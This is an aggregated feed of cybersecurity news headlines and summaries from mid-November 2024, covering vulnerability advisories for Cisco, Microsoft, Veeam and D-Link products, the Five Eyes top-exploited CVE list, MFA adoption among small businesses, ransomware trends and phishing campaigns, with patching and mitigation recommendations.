Hong Kong has witnessed a significant uptick in cyberattacks in recent years, prompting authorities to take decisive action. In the first half of 2024 alone, the city reported 16,182 cases involving technology crimes, a 3.5% increase from the previous year's figures. The financial impact of these incidents is staggering, with losses reaching HK$2.66 billion (approximately US$341.8 million). In response to this concerning trend, the Hong Kong government proposed the Protection of Critical Infrastructure (Computer System) Bill, which aims to impose stringent security requirements on operators of essential infrastructure. Under this legislation, non-compliance could result in fines of up to HK$5 million. Currently, the bill is under consultation with the Security Bureau and is anticipated to be enacted by early 2026.
by The Cyber Express
2024-11-15 10:19:01
Research Highlights SHA256 Password Security Strengths and Risks

A new study by Specops Software explores the resilience of SHA256, a commonly used cryptographic hashing algorithm, against modern password-cracking techniques. The findings emphasize the algorithm's effectiveness in protecting data, especially when combined with strong, complex passwords. However, the research also highlights vulnerabilities when using short or simple passwords, even with this robust technology. SHA256, […] The post Research Highlights SHA256 Password Security Strengths and Risks appeared first on IT Security Guru.
by IT Security Guru
2024-11-15 09:17:00
Humans of HTB #10: Isaiah's journey into sales

Isaiah began his journey at Hack The Box in 2023, joining the BDR team. He is now an SLED Account Executive.
by Hack The Box Blog
2024-11-15 09:00:00
Cybersecurity Snapshot: Five Eyes Rank 2023's Most Frequently Exploited CVEs, While CSA Publishes Framework for AI System Audits

Check out the CVEs attackers targeted the most last year, along with mitigation tips. Plus, a new guide says AI system audits must go beyond check-box compliance. Meanwhile, a report foresees stronger AI use by defenders and hackers in 2025. And get the latest on cloud security, SMBs' MFA use and the CIS Benchmarks.

Dive into six things that are top of mind for the week ending Nov. 15.

1 - Report ranks 2023's most frequently exploited vulnerabilities

Wondering what were attackers' preferred vulnerabilities last year? Cyber agencies from the Five Eyes countries have ranked these go-to bugs in a joint advisory titled "2023 Top Routinely Exploited Vulnerabilities."

Published this week, the advisory details the 47 Common Vulnerabilities and Exposures (CVEs) that attackers most often exploited in 2023, along with their associated Common Weakness Enumerations (CWEs). The advisory also offers prevention and mitigation recommendations both to end-user organizations, and to software vendors and developers.

A key takeaway: the majority of the CVEs listed were initially exploited as zero-days, unlike in 2022, when fewer than half were. In addition, the report found that attackers typically strike gold with vulnerabilities that are less than two years old.

Here are some of the recommendations from the authoring cyber agencies in Australia, Canada, New Zealand, the U.K. and the U.S. for end-user organizations:

- Update software, including operating systems, applications and firmware, and prioritize patching CVEs included in CISA's Known Exploited Vulnerabilities (KEV) catalog, especially those listed in the report.
- Maintain a continuously updated inventory of all your assets – both hardware and software, and on-prem and in the cloud.
- Deploy an automated, centralized patch-management system and adopt a patch-management process.
- Document the secure baseline configurations for all IT/OT systems.
- Require phishing-resistant multi-factor authentication for all users and on all VPN connections.
- Adopt the principle of least privilege when configuring access control.
- Secure internet-facing devices.
- Monitor your attack surface continuously.
- Contractually require your software vendors to provide you with software bills of materials (SBOMs) for their products, and inquire whether they employ secure-by-design principles.

The five CVEs atop the list are:

- CVE-2023-3519
- CVE-2023-4966
- CVE-2023-20198
- CVE-2023-20273
- CVE-2023-27997

To get all the details, read the full advisory "2023 Top Routinely Exploited Vulnerabilities."

For more information about vulnerability management, check out these Tenable resources:

- "From Bugs to Breaches: 25 Significant CVEs As MITRE CVE Turns 25" (blog)
- "Turning Data into Action: Intelligence-Driven Vulnerability Management" (blog)
- "Context Is King: From Vulnerability Management to Exposure Management" (blog)
- "Secure Your Sprawling Attack Surface With Risk-based Vulnerability Management" (blog)
- "Mitigating AI-Related Security Risks: Insights and Strategies with Tenable AI Aware" (on-demand webinar)

2 - CSA: AI systems require holistic audits

When it comes to auditing artificial intelligence (AI) systems, auditors need to go beyond basic regulatory compliance requirements, and instead aim to assess their trustworthiness in a holistic, comprehensive manner.

That's the main message in the Cloud Security Alliance's new report "Artificial Intelligence (AI) Risk Management: Thinking Beyond Regulatory Boundaries," which was published this week and offers a risk-based framework for auditing AI systems throughout their lifecycle.

While it's critical for AI audits to be accurate, "trust in AI can only be achieved through a far-reaching approach to auditing that goes beyond what's required," researcher Ryan Gifford, a leader in the CSA's AI Governance & Compliance Working Group, said in a statement.

The paper addresses a wide range of AI audit elements, including AI governance; the role of data and sensors; applicable laws, regulations and standards; data and privacy; algorithms, training methods and models; and security systems – to name just a few.

The 101-page document also includes hundreds of suggested questions to include in an AI audit, covering 25 topics. For example, the paper suggests 19 questions to ask about AI security systems, organized into seven sub-categories, including authentication and access control; data sanitization; encryption and key management; and security monitoring.

These are just a few of the questions in the AI security systems section:

- How are security vulnerabilities actively identified and mitigated in software and hardware components? Through regular updates and patching?
- How is security data from multiple sources integrated and analyzed to provide a centralized platform for threat detection, incident response, and comprehensive security monitoring?
- How is the legitimacy of people and system accounts requesting access confirmed?
- Which authentication methods are used to ensure that only authorized entities gain access?

For more information about AI system audits:

- "Auditing AI: The emerging battlefield of transparency and assessment" (Thomson Reuters)
- "AI transparency: What is it and why do we need it?" (TechTarget)
- "US agency calls for audits of AI systems to ensure accountability" (Roll Call)
- "Navigating the AI Audit: A Comprehensive Guide to Best Practices" (Law.com)
- "Trust but verify: Digging into audits for AI algorithm bias" (TechTarget)

3 - Google: Attackers will deepen AI use in 2025

Expect the AI cyberwars to get nastier and more sophisticated next year. In 2025, hackers will double down on their use of AI to boost their cyberattacks, while security teams will further leverage AI security tools to improve their cyberdefenses.

That's one of the main takeaways from Google Cloud's "Cybersecurity Forecast 2025" report, released this week.

"While AI is rapidly bringing new tools for threat detection and response, it also provides malicious actors with powerful capabilities for social engineering, disinformation, and other attacks," reads the report.

Here are some ways in which Google Cloud expects cyberattackers to more aggressively employ generative AI tools, LLMs, deepfakes and other AI technologies in 2025:

- To further scale and enhance social engineering attacks, including phishing and vishing
- To supercharge cybercrime and cyberespionage
- To research vulnerabilities they can exploit
- To streamline and accelerate development of malicious code
- To rapidly create content for disinformation campaigns

"As AI capabilities become more widely available throughout 2025, enterprises will increasingly struggle to defend themselves against these more frequent and effective compromises," the report reads.

By the same token, cybersecurity teams will move into what the report calls "a second phase" of AI use. During the first phase, defenders used AI tools for repetitive tasks, such as summarizing reports and querying data sets. In 2025, cybersecurity teams will extend their AI use towards "semi-autonomous" security operations.

"This includes being able to parse through alerts - even with false positives - to create a list of the highest priority items, enabling security teams to further triage and remediate the risks that matter most," the report reads. However, the output of these AI security operations will still need to be verified by a security professional.

The report also looks at how trends like geopolitical cyberthreats, ransomware and infostealer malware are likely to develop in 2025.

For more information about cloud security trends:

- "Who's Afraid of a Toxic Cloud Trilogy?" (Tenable)
- "Top Ten Cloud Security Mitigation Strategies" (U.S. National Security Agency)
- "What is cloud security management? A strategic guide" (TechTarget)
- "How to choose, configure and use cloud services securely" (U.K. National Cyber Security Centre)
- "How To Protect Your Cloud Environments and Prevent Data Breaches" (Tenable)

4 - Tenable poll looks at cloud security practices

During our recent webinar "Empower Your 2025 Cloud Security Planning with Tenable's Data Insights," we informally polled attendees about cloud security issues, such as workloads afflicted by the "toxic trilogy" of cloud risks. Check out the results!

(Poll result chart: 51 webinar attendees polled by Tenable, November 2024)

(Poll result chart: 39 webinar attendees polled by Tenable, November 2024)

Check out this on-demand webinar for a discussion of the valuable insights in the new "Tenable Cloud Risk Report 2024," including concrete recommendations for improving your organization's cloud security.

5 - Report: MFA widely underused, misunderstood by SMBs

A majority of small and medium-sized businesses (SMBs) surveyed about multi-factor authentication (MFA) haven't adopted this identity and access management (IAM) technology and ignore its security benefits.

That's a key finding from a report based on a global survey of almost 2,300 SMBs conducted by the Cyber Readiness Institute (CRI) and published this week.

"MFA is no longer a luxury or optional security measure - it is a fundamental necessity in today's digital landscape. The time for SMBs to act is now," the report reads.

Specifically, 65% of SMBs polled said they haven't implemented MFA, and most of them (61%) have no plans to adopt MFA in the foreseeable future. Barriers to adoption include:

- the cost to acquire and deploy MFA tools
- lack of technical expertise to choose the right product
- lack of awareness about MFA's benefits

A bright spot for MFA adoption is the U.S., where SMBs buck the global trend, with 89% of respondents saying they've adopted the technology, and 55% saying they're "very aware" of MFA and its benefits.

(Survey chart: "The following best describes the level of awareness you have of MFA and the related security benefits at your company")

So what can be done to promote MFA adoption among SMBs? Here are some recommendations from the report:

- Government agencies, industry groups, non-profit organizations and cybersecurity vendors should collaborate on campaigns to educate SMBs about the benefits of MFA.
- Software vendors should include MFA capabilities as part of broader software packages at no additional cost.
- Governments should offer incentives to SMBs, such as tax breaks and subsidies, while larger businesses should reward their SMB partners that adopt MFA.
- Vendors, government agencies and industry groups should offer SMBs technical assistance after they adopt MFA to ensure their continued success with the technology.

To get more details, read:

- The CRI report "Unlocking MFA Adoption: Why Small and Medium-Sized Businesses Must Act Now to Strengthen Their Cybersecurity"
- The report's announcement "New Study Underscores Slow Adoption of Multifactor Authentication By Global SMBs"

6 - CIS Benchmarks for Apple, Azure, Oracle get updated

The Center for Internet Security (CIS) just announced the latest updates to its CIS Benchmarks, including the ones for Azure Kubernetes Service (AKS), Oracle Cloud Infrastructure for Kubernetes (OKE) and several versions of Apple's macOS.

Specifically, these CIS Benchmarks were updated in October:

- CIS Amazon Web Services Foundations Benchmark v4.0.0
- CIS Apple macOS 13.0 Ventura Benchmark v3.0.0
- CIS Apple macOS 14.0 Sonoma Benchmark v2.0.0
- CIS Apple macOS 13.0 Ventura Cloud-tailored Benchmark v1.1.0
- CIS Azure Kubernetes Service (AKS) Benchmark v1.6.0
- CIS MongoDB 6 Benchmark v1.2.0
- CIS MongoDB 7 Benchmark v1.1.0
- CIS Oracle Cloud Infrastructure for Kubernetes (OKE) Benchmark v1.6.0
- CIS SUSE Linux Enterprise 12 Benchmark v3.2.0

In addition, these three new CIS Benchmarks were released:

- CIS Apple iOS 18 Benchmark v1.0.0
- CIS Apple iPadOS 18 Benchmark v1.0.0
- CIS Apple macOS 15.0 Sequoia Benchmark v1.0.0

The CIS Benchmarks' secure-configuration guidelines are designed to help security teams harden software against attacks. There are currently more than 100 Benchmarks for 25-plus vendor product families. There are CIS Benchmarks for cloud platforms; databases; desktop and server software; mobile devices; operating systems; and more.

To get more details, read the CIS blog "CIS Benchmarks November 2024 Update." For more information about the CIS Benchmarks list, check out its home page, as well as:

- "Getting to Know the CIS Benchmarks" (CIS)
- "Security Via Consensus: Developing the CIS Benchmarks" (Dark Reading)
- "How to Unlock the Security Benefits of the CIS Benchmarks" (Tenable)
- "CIS Benchmarks Communities: Where configurations meet consensus" (Help Net Security)
- "CIS Benchmarks: DevOps Guide to Hardening the Cloud" (DevOps)
by Tenable
2024-11-15 08:45:14
High-Severity Vulnerability in Cisco ECE Could Lead to Denial of Service, CERT-In Issues Alert
The Computer Emergency Response Team of India (CERT-In) has issued a high-severity alert regarding a newly identified vulnerability in Cisco's Enterprise Chat and Email (ECE) platform. Tagged as CERT-In Vulnerability Note CIVN-2024-0339, this vulnerability could allow an unauthenticated, remote attacker to cause a Denial of Service (DoS) condition on affected Cisco systems. The notice is aimed primarily at IT administrators and individuals responsible for securing and maintaining Cisco ECE systems.
Who is Affected?
This vulnerability primarily impacts IT administrators and individuals tasked with maintaining or securing Cisco Enterprise Chat and Email systems. Those responsible for Cisco ECE should check whether EAAS is active. To verify, log into the System Console, navigate to Partitions > Partition > Services > Unified CCE > EAAS > Instances, and confirm whether an EAAS instance is running. Systems running EAAS are exposed to this vulnerability.
Overview of the Vulnerability
The issue stems from insufficient validation of Media Routing Peripheral Interface Manager (MR PIM) traffic. An unauthenticated, remote attacker could exploit this vulnerability by sending specially crafted MR PIM traffic to the affected system. This causes the MR PIM connection between Cisco ECE and Cisco Unified Contact Center Enterprise (CCE) to fail, which in turn disrupts EAAS functions. The result is a Denial of Service (DoS) condition that disables the EAAS feature and prevents customers from initiating chat, callback, or delayed callback sessions. Normal operation can be restored by restarting the EAAS process manually, but the interruption poses a significant service disruption risk for organizations that rely on Cisco ECE for real-time customer service.
Cisco's Response and Solutions
Advisory and Fix: Cisco has responded with an advisory (ID: cisco-sa-ece-dos-Oqb9uFEv) detailing the vulnerability and recommending an upgrade of affected software to a fixed release. The vulnerability is assigned CVE-2024-20484 with a CVSS base score of 7.5, reflecting the high impact of this flaw.
Affected Products: Only Cisco ECE systems configured to use EAAS are affected. Customers can verify the EAAS configuration through the System Console as noted above.
No Available Workarounds: There are currently no temporary solutions or workarounds that mitigate this vulnerability. The only effective measure is upgrading to the appropriate fixed software version released by Cisco.
Fixed Releases: Cisco has issued updates that address the vulnerability. The recommended upgrades are:
Cisco ECE Release | First Fixed Release
Earlier than 12.5 | Migrate to a fixed release
12.5 | 12.5(1) ES9
12.6 | 12.6(1) ES9 ET3
Customers are advised to update to these versions to protect against this vulnerability.
Next Steps for Cisco Users
For Contracted Customers: Customers with an active Cisco service contract can access these updates through the usual software update channels. Those entitled to service contracts may obtain security patches and support without additional fees, but they must abide by the Cisco software license terms.
For Non-Contracted Customers: If you purchased Cisco products directly or through an authorized reseller but do not have a service contract, you can still obtain updates by contacting the Cisco Technical Assistance Center (TAC). Be sure to provide the product serial number and a reference to this advisory to verify your eligibility for a free upgrade.
Licensing and Installation: When downloading these updates, ensure that your device's configuration is compatible with the new releases. If in doubt, Cisco recommends reaching out to its support team or the TAC. All updates should be acquired through authorized channels to avoid issues with licensing or support.
Key Security Recommendations
Prioritize Immediate Updates: IT administrators should prioritize upgrading affected Cisco ECE systems to the versions specified. Given the high severity rating, this vulnerability represents a substantial risk to uninterrupted service.
Verify EAAS Configuration: Confirm whether EAAS is active on your Cisco ECE system. If you are not using EAAS, your system may not be affected, but it is still advisable to monitor for updates and further advisories.
Monitor for Further Security Notices: Cisco regularly releases updates and advisories for security vulnerabilities. IT teams should routinely check Cisco's security advisories for new information that may impact their systems and infrastructure.
Manually Restart EAAS if Affected by DoS: Where a system is impacted by this vulnerability, the EAAS process must be restarted manually. This can be done via the System Console by selecting Shared Resources > Services > Unified CCE > EAAS, then clicking “Start.”
by The Cyber Express
2024-11-15 08:44:40
Vietnam Strengthens Cybersecurity by Partnering with CISA to Secure Critical Infrastructure
The Vietnam Authority of Information Security (AIS), part of the Ministry of Information and Communications, has signed a memorandum of understanding (MoU) with the Cybersecurity and Infrastructure Security Agency (CISA) under the US Department of Homeland Security. The agreement marks the official establishment of a partnership focused on network security and strengthens the comprehensive strategic relationship between Vietnam and the United States.
Vietnam Authority of Information Security Forms Partnership with CISA
The signing ceremony in Hanoi highlighted Vietnam's commitment to protecting its critical digital infrastructure and promoting a secure cyberspace. Tran Quang Hung, the acting director of AIS, underscored the significance of the collaboration, noting that the partnership would enhance Vietnam's cybersecurity capabilities in the face of increasingly sophisticated cyber threats. “Working with an experienced organization like CISA bolsters our ability to protect national interests and contributes to a safer, more prosperous future for all,” he said, as reported by The Star. CISA plays a crucial role in US cybersecurity efforts, particularly in protecting critical infrastructure from a range of cyber threats. During the signing, Trent Frazier, deputy assistant director of the Stakeholder Engagement Division at CISA, emphasized that “collaboration is essential for successfully defending critical infrastructure and enhancing overall cybersecurity capabilities.” The partnership is expected not only to benefit Vietnam but also to advance US efforts to promote innovation and secure its digital assets while combating the rising tide of cyber risks. The MoU aims to solidify the existing relationship between the two agencies by establishing a framework for ongoing cooperation. Both parties are committed to working together to achieve the goals set out in the agreement, and they anticipate that the collaboration will evolve into a sustainable and robust partnership, aligned with the broader strategic alliance between Vietnam and the US.
Much-Needed Collaboration
Vietnam's proactive stance on cybersecurity is especially timely, given the increasing prevalence of cyber threats, including ransomware attacks and state-sponsored hacking. The cooperation with CISA is expected to give Vietnam valuable access to advanced cybersecurity practices and resources. The agreement also reflects a broader commitment to international collaboration in cybersecurity. As threats continue to evolve, it becomes imperative for nations to work together to protect their digital infrastructure, and the partnership between the Vietnam Authority of Information Security and CISA exemplifies the importance of united efforts in addressing global cybersecurity challenges. A secure and resilient cyberspace is a necessity for the modern world. By partnering with CISA, Vietnam is taking significant strides to enhance its cybersecurity posture, ensuring that it can effectively defend against potential attacks while contributing to a safer digital environment for its citizens and businesses. With a shared commitment to protecting critical infrastructure and addressing evolving cyber threats, both countries are better positioned to ensure a secure cyberspace for their populations and economies.
by The Cyber Express
2024-11-15 08:20:00
Palo Alto Networks’ customer migration tool hit by trio of CVE exploitsCISA warned of two critical and actively exploited vulnerabilities in Expedition one week after another CVE came under active exploitation in the same product.
by Cybersecurity Dive
2024-11-15 08:12:00
Microsoft revamps how it will disclose vulnerabilitiesThe company said the additional disclosure method using the Common Security Advisory Framework will help organizations better prioritize CVEs.
by Cybersecurity Dive
2024-11-15 07:06:02
Cyble IT Vulnerability Report: Microsoft Zero Days Under Attack
A pair of actively exploited Microsoft zero-day vulnerabilities highlighted an active November Patch Tuesday, which also saw updates from several IT vendors.
Overview
Cyble Research and Intelligence Labs (CRIL) researchers investigated 22 vulnerabilities and eight dark web exploits from Nov. 6 to 12 and highlighted nine vulnerabilities that merit high-priority attention from security teams. CRIL researchers also identified six high-risk dark web exploits in Cyble's weekly IT vulnerability report to clients, which examined two Microsoft zero-days and vulnerabilities from Veeam, Cisco, HPE Aruba, D-Link, Citrix, and others. Security teams should identify the vulnerabilities that are present in their environments and apply patches and mitigations promptly.
The Week's Top IT Vulnerabilities
Here are the top IT vulnerabilities identified by Cyble threat intelligence researchers this week.
CVE-2024-43451 is an NTLM hash disclosure spoofing vulnerability found in all supported versions of Windows that has been exploited in the wild since at least April. Researchers disclosed this week that suspected Russian hackers exploited it in zero-day attacks targeting Ukrainian entities. The attacks began with phishing emails containing links to download a malicious Internet shortcut file which, when interacted with, triggered the vulnerability to connect to a remote server and download malware.
CVE-2024-49039 is an elevation of privilege vulnerability in Windows Task Scheduler that has also been attacked. From a low-privilege AppContainer, an attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment, Microsoft said. A successful exploit could allow an attacker to execute RPC functions that are restricted to privileged accounts.
CVE-2024-49040 is a high-severity spoofing vulnerability in Microsoft Exchange Server that allows attackers to forge legitimate senders on incoming emails, making malicious messages much more effective. A researcher reported a proof of concept (PoC) for this vulnerability, but Microsoft paused the update after some customers reported issues with transport rules stopping periodically after the update was installed.
CVE-2024-40711 is a critical vulnerability in Veeam Backup & Replication (VBR) servers caused by a deserialization of untrusted data weakness that unauthenticated threat actors can exploit to gain remote code execution (RCE). The vulnerability was previously observed being leveraged in Akira and Fog ransomware attacks; researchers have now observed it being exploited to deploy a newly identified strain of Frag ransomware.
CVE-2024-42509 and CVE-2024-47460 are command injection vulnerabilities in the AOS-8 and AOS-10 versions of HPE Aruba's network operating system. The flaw lies in the underlying CLI service and could lead to unauthenticated remote code execution by sending specially crafted packets to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation results in the ability to execute arbitrary code as a privileged user on the underlying operating system. Cyble researchers detailed these vulnerabilities and others in a separate blog.
CVE-2024-20418 is a critical vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points, a specialized software solution designed to provide robust and reliable wireless connectivity for industrial applications. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system of the affected device. Cyble also covered this vulnerability in a separate blog.
CVE-2024-10914 is a critical command injection vulnerability in end-of-life (EOL) D-Link network-attached storage (NAS) devices. Unauthenticated attackers can exploit it to inject arbitrary shell commands by sending malicious HTTP GET requests to vulnerable D-Link NAS devices exposed online. Researchers observed that attackers are exploiting the vulnerability with publicly available exploit code.
CVE-2024-11068 is a critical incorrect-use-of-privileged-API vulnerability impacting the end-of-life D-Link DSL6740C modem. It allows unauthenticated remote attackers to modify any user's password by leveraging the API, thereby granting access to Web, SSH, and Telnet services using that user's account. Since D-Link recently announced that it will not provide patches or updates for this EOL product, the vulnerability poses a significant risk to users.
Vulnerabilities and Exploits on Underground Forums
CRIL researchers also observed multiple Telegram channels and underground forums where threat actors shared or discussed exploits weaponizing vulnerabilities. Those vulnerabilities include:
CVE-2024-39205: A critical vulnerability affecting pyload-ng, versions 0.5.0b3.dev85 running under Python 3.11 or below. It allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise.
CVE-2024-50340: A high-severity vulnerability affecting the Symfony PHP framework. It allows an attacker to manipulate the application's environment or debug mode by sending specially crafted query strings.
CVE-2024-8068 and CVE-2024-8069: These recently identified vulnerabilities in Citrix Session Recording pose significant security risks for Citrix environments. CVE-2024-8068 allows privilege escalation to the NetworkService account access level, and CVE-2024-8069 allows limited remote code execution with the privileges of a NetworkService account.
CVE-2024-47295: A high-severity vulnerability in SEIKO EPSON Web Config that allows a remote unauthenticated attacker to set an arbitrary administrator password on affected devices. It results from an insecure initial password configuration in which the administrator password is left blank.
CRIL researchers also observed a threat actor discussing the critical vulnerability CVE-2023-38408, which affects 26 million internet-facing OpenSSH assets detected by Cyble. The vulnerability allows remote code execution (RCE) when the SSH agent is forwarded to an attacker-controlled system.
Cyble Recommendations
To protect against these vulnerabilities and exploits, organizations should implement the following best practices:
Regularly update all software and hardware systems with the latest patches from official vendors. Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
Implement immutable, air-gapped, ransomware-resistant backup procedures for sensitive and critical data.
Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activity. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate action.
Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.
Conclusion
These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussion of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.
by CYBLE
2024-11-15 04:45:32
An Interview With the Target & Home Depot HackerIn December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and seeking publicity for several new money-making schemes.
by Krebs on Security
2024-11-15 00:38:16
TSA Proposes Cyber-Risk Mandates for Pipelines, Transportation SystemsThe proposed rules codify existing temporary directives requiring pipeline and railroad operators to report cyber incidents and create cyber-risk management plans.
by Dark Reading
2024-11-15 00:00:00
[webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
by Exploit DB
2024-11-14 23:51:57
Frenos Takes Home the Prize at 2024 DataTribe ChallengeFrenos offers a zero-impact, continuous security assessment platform for operational technology environments.
by Dark Reading
2024-11-14 23:06:00
Experts Uncover 70,000 Hijacked Domains in Widespread 'Sitting Ducks' Attack SchemeMultiple threat actors have been found taking advantage of an attack technique called Sitting Ducks to hijack legitimate domains for use in phishing attacks and investment fraud schemes for years. The findings come from Infoblox, which said it identified nearly 800,000 vulnerable registered domains over the past three months, of which approximately 9% (70,000) have been subsequently
by The Hacker News
2024-11-14 23:00:12
Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing AttackNorth Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities.
by Palo Alto Networks - Unit42
2024-11-14 22:13:43
122 million people’s business contact info leaked by data brokerA data broker has confirmed a business contact information database containing 132.8 million records has been leaked online.
by Malwarebytes Labs
2024-11-14 21:53:19
Varonis Warns of Bug Discovered in PostgreSQL PL/PerlSeveral versions of PostgreSQL are impacted, and customers will need to upgrade in order to patch.
by Dark Reading
2024-11-14 21:42:48
Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0Learn how to identify, understand, attack, and remediate SMB shares configured with excessive privilege in active directory environments with the help of new charts, graphs, and LLM capabilities.
by NetSPI
2024-11-14 21:39:45
Consumer Sector Becomes Top Ransomware TargetAlthough attacks slightly decreased last quarter, ransomware remains a critical threat, with new strains like Cicada3301 targeting Linux and ESXi systems.
by ITPro Today
2024-11-14 21:16:00
Sparc Group uses Barracuda to ensure security during rapid expansionOne of the challenges facing companies that expand their operations rapidly is maintaining consistent security as their attack surfaces grow. Learn how Sparc Group's relationship with Barracuda has developed in this case study blog.
by Barracuda
2024-11-14 20:50:19
Idaho Man Turns to RaaS to Extort OrthodontistIn addition to his prison sentence, he will have to pay more than $1 million in restitution to his victims.
by Dark Reading
2024-11-14 20:12:00
Is your iPhone rebooting after being inactive? It's a feature, not a bugThis security feature protects your data from thieves. Here's how.
by ZDNET Security
2024-11-14 19:30:00
Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto SchemesGoogle has revealed that bad actors are leveraging techniques like landing page cloaking to conduct scams by impersonating legitimate sites. "Cloaking is specifically designed to prevent moderation systems and teams from reviewing policy-violating content which enables them to deploy the scam directly to users," Laurie Richardson, VP and Head of Trust and Safety at Google, said. "The landing
by The Hacker News
2024-11-14 19:11:42
These 8 Apps on Google Play Store Contain Android/FakeApp TrojanEight Android apps on the Google Play Store, downloaded by millions, contain the Android.FakeApp trojan, stealing user data…
by Hackread
2024-11-14 19:04:23
The 10 most popular passwords of 2024 are also the worst: 5 easy ways to do betterPeople are still opting for easy-to-guess passwords, says NordPass. Here's how to better protect your accounts and why you should.
by ZDNET Security
2024-11-14 18:43:51
Building complex gen AI models? This data platform wants to be your one-stop shopExclusive: Encord puts multimodal AI data - including audio - all in one platform.
by ZDNET Security
2024-11-14 18:00:00
The Vendor's Role in Combating Alert FatigueAs alerts pile up, the complexity can overwhelm security professionals, allowing real threats to be missed. This is where vendors must step up.
by Dark Reading
2024-11-14 17:47:41
CISO job dissatisfaction: How email security products can help turn the tideThe role of a chief information security officer (CISO) is more challenging than ever before, and recent studies indicate that job dissatisfaction among CISOs is alarmingly high.
by Barracuda
2024-11-14 17:40:00
5 BCDR Oversights That Leave You Exposed to RansomwareRansomware isn’t just a buzzword; it’s one of the most dreaded challenges businesses face in this increasingly digitized world. Ransomware attacks are not only increasing in frequency but also in sophistication, with new ransomware groups constantly emerging. Their attack methods are evolving rapidly, becoming more dangerous and damaging than ever. Almost all respondents (99.8%) in a recent
by The Hacker News
2024-11-14 17:30:17
Cloud Ransomware Flexes Fresh Scripts Against Web AppsCloud service providers are getting better at protecting data, pushing adversaries to develop new cloud ransomware scripts to target PHP applications, a new report says.
by Dark Reading
2024-11-14 17:13:31
New Apple security feature reboots iPhones after 3 days, researchers confirm"Inactivity reboot" effectively puts iPhones in a more secure state by locking the user's encryption keys in the iPhone's secure enclave chip.
by TechCrunch
2024-11-14 16:54:47
How the BEAST attack works: Reading encrypted data without decryptionBEAST, or Browser Exploit Against SSL/TLS, was a man-in-the-middle attack that could expose information from an encrypted SSL/TLS 1.0 session. The attack exploited a known cipher suite vulnerability that was considered low-risk until a proof of concept arrived, prompting browser vendors and web server administrators to quickly move to TLS v1.1. This article shows how the BEAST attack worked, how a theoretical vulnerability became practically exploitable, and why modern browsers are no longer vulnerable.
by Invicti
2024-11-14 16:46:33
Silicon Valley Eyes a Windfall From Trump’s Plans to Gut RegulationSome tech start-ups and investors anticipate a golden era when Donald Trump returns to office, thanks to government contracts and deregulation.
by ITPro Today
2024-11-14 16:34:05
How To Repair Corrupt STL Files for 3D PrintingRepair options include using dedicated STL repair software, manual CAD edits, or slicer repair tools, along with preventative practices like backing up files and checking geometry integrity to ensure successful prints.
by ITPro Today
2024-11-14 16:32:27
CISA and FBI: Chinese Hackers Compromised US Telecom NetworksThe CISA and FBI have issued an advisory detailing a sophisticated cyberespionage campaign by state-sponsored Chinese hackers that…
by Hackread
2024-11-14 16:00:00
TikTok Pixel Privacy Nightmare: A New Case StudyAdvertising on TikTok is the obvious choice for any company trying to reach a young market, and especially so if it happens to be a travel company, with 44% of American Gen Zs saying they use the platform to plan their vacations. But one online travel marketplace targeting young holidaymakers with ads on the popular video-sharing platform broke GDPR rules when a third-party partner misconfigured
by The Hacker News
2024-11-14 15:32:11
‘SilkSpecter’ Campaign Uses 4,000 Fake Domains Against Black Friday ShoppersA newly discovered phishing campaign linked to the Black Friday shopping season launched by a financially motivated threat actor, dubbed “SilkSpecter,” is targeting e-commerce shoppers in the U.S. and Europe. EclecticIQ’s research indicates that this campaign, active since early October 2024, employs fake discount-themed phishing sites to steal sensitive information from online shoppers eager for …
by Cyber Insider
2024-11-14 15:32:07
Bitsight buys dark web security specialist Cybersixgill for $115MMore consolidation is afoot in the world of cybersecurity. Bitsight, a cybersecurity startup last valued at $2.4 billion when ratings firm Moody’s took a stake in the business and became its largest shareholder in 2021, is acquiring Cybersixgill for $115 million. Boston-based Bitsight’s focus is cyber risk management. It works with enterprises to assess their […]
by TechCrunch
2024-11-14 15:24:04
Miami Beach Alerts Residents to Data Breach from Docs ExposureThe City of Miami Beach disclosed a security incident that exposed personal information from some of its utility customers. The breach was due to an inadvertent file exposure in the city's document management system, making sensitive data briefly accessible to unauthorized users. The breach was first detected on October 14, 2024, after the initial exposure …
by Cyber Insider
2024-11-14 15:21:00
New RustyAttr Malware Targets macOS Through Extended Attribute AbuseThreat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr. The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including
by The Hacker News
2024-11-14 15:09:42
